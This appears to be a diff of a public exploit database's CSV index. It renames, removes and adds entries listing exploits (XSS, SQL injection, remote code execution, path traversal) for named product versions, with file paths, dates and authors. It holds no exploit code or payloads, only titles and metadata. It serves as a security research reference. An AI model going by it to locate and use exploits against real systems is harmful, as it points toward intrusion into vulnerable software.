49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||||
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||||
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
||||||
49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
||||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||||
49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
|
|
||||||
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
||||||
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
||||||
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
||||||
|
@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
|
49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
|
||||||
49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
|
49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
|
||||||
49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
|
49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
|
||||||
49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
|
49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby,
|
||||||
49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
|
49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
|
||||||
49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
|
49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
|
||||||
49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
|
49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
|
||||||
|
@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
|
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
|
||||||
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
|
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
|
||||||
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
|
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
|
||||||
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
|
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,
|
||||||
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
|
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
|
||||||
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
|
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
|
||||||
49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
|
49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
|
||||||
|
@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port
|
||||||
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
||||||
49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
|
49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
|
||||||
49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
|
49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
|
||||||
|
49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php,
|
||||||
|
49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php,
|
||||||
|
49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
|
||||||
|
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
|
||||||
|
49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
|
||||||
|
|